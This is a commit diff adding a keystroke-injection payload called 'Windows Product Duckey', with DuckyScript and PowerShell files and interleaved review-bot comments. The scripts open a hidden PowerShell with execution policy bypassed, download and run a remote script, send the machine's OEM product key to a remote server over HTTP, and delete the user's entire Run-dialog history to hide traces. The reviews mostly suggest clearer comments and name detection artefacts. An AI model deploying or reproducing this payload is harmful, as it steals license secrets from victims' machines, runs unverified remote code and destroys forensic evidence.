added payload Windows Product Duckey
parent
05f5b9c401
commit
3378957961
|
@ -0,0 +1,4 @@
|
|||
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null; Exit
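Review bot: The product key is placed in the query string of a plain `http://` GET, so it is readable by anything on the network path and is written to the receiving server's access log; the only comment in this file does not mention that, and the same request appears in the 10-line PowerShell file later in this commit. I would state it in the header comment, e.g. `# NOTE: the key is sent unencrypted in the URL and will appear in proxy and web-server logs; treat those logs as sensitive.` The comment should also say that `OA3xOriginalProductKey` is the OEM key held in firmware, which as far as I know is empty on machines that have none, so the `duckey=` parameter can arrive blank. This one-line variant also has no comment on the `RunMRU` removal, which the longer file does label.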
|
|
@ -0,0 +1,14 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://REMOTE_IP_ADDRESS/.ps1; invoke-expression $pl
|
||||
DELAY 500
|
||||
ENTER
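Review bot: The `REM Description` line describes only the exfiltration, while the `STRING` line types a hidden, non-interactive PowerShell with `-Exec Bypass` that downloads a script over plain HTTP and passes it to `invoke-expression`, so whatever answers at that address is executed on the test machine with no integrity check. The header should say so, for example `REM Description: Opens the Run dialog and starts a hidden PowerShell that downloads and executes a script from REMOTE_IP_ADDRESS; that script sends the OEM product key to the configured host.` A further `REM` line listing what a run leaves behind for the blue team (a Run-dialog launch of `powershell` with these flags, the outbound HTTP requests, the emptied `RunMRU` key) would make the payload more useful in detection exercises. The 17-line variant that follows carries the same header.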
|
|
@ -0,0 +1,17 @@
|
|||
REM Title: Windows Product Duckey
|
||||
REM Author: Who-Is-Julien
|
||||
REM Description: This payload exfiltrate the target's Windows product key to a remote server.
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
DEFINE REMOTE_IP_ADDRESS 192.168.1.10
|
||||
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
|
||||
STRING REMOTE_IP_ADDRESS
|
||||
STRING /.ps1; invoke-expression $pl
|
||||
DELAY 500
|
||||
ENTER
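Review bot: `DEFINE REMOTE_IP_ADDRESS 192.168.1.10` commits a real private address as the default, so an unedited copy sends its request to whichever host holds 192.168.1.10 on the network it is plugged into. A value that cannot resolve, such as `DEFINE REMOTE_IP_ADDRESS CHANGE_ME`, fails closed instead. The `REM Replace REMOTE_IP_ADDRESS ...` line above it is also stale for this variant, because the value to edit is now the `DEFINE` line; `REM Set the DEFINE below to the address of the server hosting the script.` would match.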
|
|
@ -0,0 +1,10 @@
|
|||
#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
|
||||
|
||||
|
||||
#clear windows run dialog history
|
||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||
|
||||
#retrieve and send the computer's original product key to a remote server
|
||||
Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
|
||||
|
||||
Exit
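Review bot: The comment `#clear windows run dialog history` understates what the next line does: `-Name "*"` removes every value under `RunMRU`, so the user's own earlier Run entries are deleted along with the one typed by the payload, and nothing restores them. I would word it `# Deletes ALL values under RunMRU (the user's whole Run-dialog history, not only this payload's entry); this also removes an artefact an investigator would look for.` The script also has no header naming the payload it belongs to, so a short title/author/purpose block matching the `REM` headers of the DuckyScript files would help.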
|